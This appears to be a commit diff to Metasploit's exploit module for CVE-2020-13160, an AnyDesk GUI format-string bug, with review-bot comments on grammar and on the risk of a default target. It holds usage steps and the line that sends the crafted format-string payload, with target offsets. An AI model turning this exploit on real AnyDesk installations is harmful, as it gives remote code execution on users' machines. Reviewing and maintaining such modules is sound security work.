Fix some grammatical mistakes and set a default target for anydesk

This commit is contained in:
Spencer McIntyre 2020-07-01 15:27:33 -04:00
parent bb33bc9c62
commit a27bf9df38
2 changed files with 9 additions and 8 deletions

@ -3,18 +3,17 @@
This vulnerability affects Linux versions 5.5.2 and older. Old versions of AnyDesk can be downloaded from their site at
https://download.anydesk.com/linux/. Use the `.deb` package for an Ubuntu installation.
The check method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the the
target to respond with it's own discovery frame. Each of these are sent from a random source port to the default AnyDesk
The `check` method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the
target to respond with its own discovery frame. Each of these are sent from a random source port to the default AnyDesk
discovery service port of 50001. To configure the listening service in Metasploit, change the `SRVHOST` and `SRVPORT`
options. The exploit will use this method to detect the remote hostname and confirm that the operating system is Linux
before proceeding.
## Verification Steps
Example steps in this format (is also in the PR):
1. Install the application
1. Start the AnyDesk GUI. A window will open, leave it running.
1. Start msfconsole
1. Start `msfconsole`
1. Do: `use exploit/linux/misc/cve_2020_13160_anydesk`
1. Set the module options
1. Do: `exploit`
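Review bot: "Each of these are sent from a random source port" still carries a number-agreement error after the "the the" and "it's" fixes in this hunk; since the commit's stated purpose is grammar, the new line should read "Each of these is sent from a random source port". Two smaller points in the same hunk: the Verification Steps lead-in "Example steps in this format (is also in the PR):" reads as leftover from the module documentation template and can be dropped, and "Set the module options" would be more useful if it named the options the paragraph above introduces (`SRVHOST`, `SRVPORT`) together with the target that must match the installed AnyDesk version.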

@ -1,5 +1,7 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
@ -14,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'AnyDesk GUI Format String Write',
'Description' => %q{
The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially
crafted discovery packet, an attacker can corrupt the front end process when it loads or refreshes. While the
crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the
discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On
successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.
},
@ -26,8 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2020-13160' ],
[ 'URL', 'https://devel0pment.de/?p=1881' ],
[ 'URL', 'https://devel0pment.de/?p=1881' ]
],
'Payload' => {
'Space' => 512,
@ -56,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
{ 'stkref1' => 93, 'stkref2' => 165, 'time@got.plt' => 0x119ddc0 - 135 }
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-06-16'
)
)
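Review bot: `'DefaultTarget' => 0` lets the module run without an explicit `set target`, but the targets carry version-specific stack offsets and a hardcoded address (`'time@got.plt' => 0x119ddc0 - 135`), and nothing in this diff selects a target from the remote version: the documentation hunk says `check` confirms only the hostname and that the OS is Linux. Against a host running a different AnyDesk build, the default target will direct the format-string write at the wrong address and most likely just crash the user's GUI process, which is noisy and a denial of service rather than a failed check. Either state next to the Verification Steps that the target must be chosen to match the installed version, or, if the discovery response exposes a version string, use it to pick the target and fail early when none matches.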
@ -148,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
udp_sock.put(build_discover_packet(hn, "#{bad_unicode}%#{target['time@got.plt']}x%#{target['stkref1']}$ln", 'ad', 'main'))
print_status('Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...')
handler
ensure
disconnect_udp
end
end